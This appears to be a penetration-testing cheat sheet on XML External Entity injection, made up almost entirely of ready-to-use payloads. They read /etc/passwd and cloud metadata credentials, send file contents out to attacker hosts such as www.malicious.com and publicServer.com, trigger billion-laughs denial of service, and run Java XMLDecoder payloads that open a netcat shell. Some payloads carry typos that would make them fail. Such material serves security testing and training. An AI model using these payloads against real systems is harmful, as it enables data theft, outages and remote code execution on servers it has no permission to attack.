XXE - XEE - XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input. Remember to URL encode the payload because you need to use the character "&".
<!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY example "Doe"> ]><userInfo><firstName>John</firstName><lastName>&example;</lastName></userInfo>
<!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY example SYSTEM "/etc/passwd"> ]><data>&example;</data><!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]><data>&example;</data><?xml version="1.0"?><!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY file SYSTEM "file:///etc/passwd">]><data>&file;</data>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds><user>&xxe;</user><pass>mypass</pass></creds>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
?xml version=”1.0" encoding=”UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="40" x="0" y="16">&xxe;</text></svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="expect://ls"></image></svg>
Extract index.php
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]><contacts><contact><name>Jean &xxe; Dupont</name><phone>00 11 22 33 44</phone><adress>42 rue du CTF</adress><zipcode>75000</zipcode><city>Paris</city></contact></contacts>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >]><foo>&xxe;</foo>
If PHP "expect" module is loaded
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "expect://id" >]><creds><user>&xxe;</user><pass>mypass</pass></creds>
The purpose of a DTD is to define the structure of an XML document. It defines the structure with a list of legal elements:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ENTITY nbsp " "><!ENTITY writer "Writer: Donald Duck."><!ENTITY copyright "Copyright: W3Schools.">]>
The DTD also can have information inside, for example, inside the last example:
<note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body><footer>&writer; ©right;</footer></note>
Send /etc/passwd to a server controller by the attacker
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "file:///etc/passwd" ><!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;"> ]><foo>&callhome;</foo>
You could also use a local DTD to attack the system: https://blog.h3xstream.com/2019/07/automating-local-dtd-discovery-for-xxe.html
If a POST request accepts the data in XML format, you could try to exploit a XXE in that request.
POST /hackingman HTTP/1.0Content-Type: application/x-www-form-urlencodedContent-Length: 7cicada=3301
POST /hackingman HTTP/1.0Content-Type: text/htmlContent-Length: 7<?xml version="1.0" encoding="UTF-8"><cicada>3301</cicada>
You could transform the JSON request to and XML and change the Content-type to application/xml and check if the request is correctly interpreted. If so, the API Rest could be vulnerable to XEE.
To change the request you could use a Burp Extension named “Content Type Converter“.
Here you can find this example. He changes a request from JSON to XML:
Content-Type: application/json;charset=UTF-8{"root": {"root": {"firstName": "Avinash","lastName": "","country": "United States","city": "ddd","postalCode": "ddd"}}}
Content-Type: application/xml;charset=UTF-8<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]><root><root><firstName>&xxe;</firstName><lastName/><country>United States</country><city>ddd</city><postalCode>ddd</postalCode></root></root>
Another example of this can be found here.
Insert the following parameter entity definition in between the XML declaration and the stockCheck element:
<!DOCTYPE message [<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamso '<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;'>%local_dtd;]>
This will import the Yelp DTD, then redefine the ISOamso entity, triggering an error message containing the contents of the /etc/passwd file.
Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.
Some applications will receive client-submitted data, embed it on the server-side into an XML document and then parse the document.
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "file:///etc/passwd" ><!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">]><foo>&callhome;</foo>
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://wpp4w63vbnnhghjj4zz.burpcollaborator.net"> %xxe; ]><stockCheck><productId>1</productId><storeId>1</storedId></stockCheck>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"><data>&send;</data>File stored on http://publicServer.com/parameterEntity_oob.dtd<!ENTITY % file SYSTEM "file:///sys/power/image_size"><!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">%all;
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">%sp;%param1;]><r>&exfil;</r>File stored on http://127.0.0.1/dtd.xml<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
Valid XML with RSS format to exploit an XXE vulnerability.
Simple HTTP request to attackers server
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE title [ <!ELEMENT title ANY ><!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>XXE Test Blog</title><link>http://example.com/</link><description>XXE Test Blog</description><lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate><item><title>&xxe;</title><link>http://example.com</link><description>Test Post</description><author>author@example.com</author><pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate></item></channel></rss>
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE title [ <!ELEMENT title ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>The Blog</title><link>http://example.com/</link><description>A blog about things</description><lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate><item><title>&xxe;</title><link>http://example.com</link><description>a post</description><author>author@example.com</author><pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate></item></channel></rss>
Using PHP base64 filter
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE title [ <!ELEMENT title ANY ><!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >]><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>The Blog</title><link>http://example.com/</link><description>A blog about things</description><lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate><item><title>&xxe;</title><link>http://example.com</link><description>a post</description><author>author@example.com</author><pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate></item></channel></rss>
<!DOCTYPE data [<!ENTITY a0 "dos" ><!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"><!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"><!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"><!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">]><data>&a4;</data>
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
XMLDecoder is a Java class that creates object based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method readObject, he will instantly gain code execution on the server.
<?xml version="1.0" encoding="UTF-8"?><java version="1.7.0_21" class="java.beans.XMLDecoder"><object class="java.lang.Runtime" method="getRuntime"><void method="exec"><array class="java.lang.String" length="6"><void index="0"><string>/usr/bin/nc</string></void><void index="1"><string>-l</string></void><void index="2"><string>-p</string></void><void index="3"><string>9999</string></void><void index="4"><string>-e</string></void><void index="5"><string>/bin/sh</string></void></array></void></object></java>
<?xml version="1.0" encoding="UTF-8"?><java version="1.7.0_21" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="6"><void index="0"><string>/usr/bin/nc</string></void><void index="1"><string>-l</string></void><void index="2"><string>-p</string></void><void index="3"><string>9999</string></void><void index="4"><string>-e</string></void><void index="5"><string>/bin/sh</string></void></array><void method="start" id="process"></void></void></java>
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html Extract info via HTTP using own external DTD: https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/ https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection https://gist.github.com/staaldraad/01415b990939494879b4 https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9
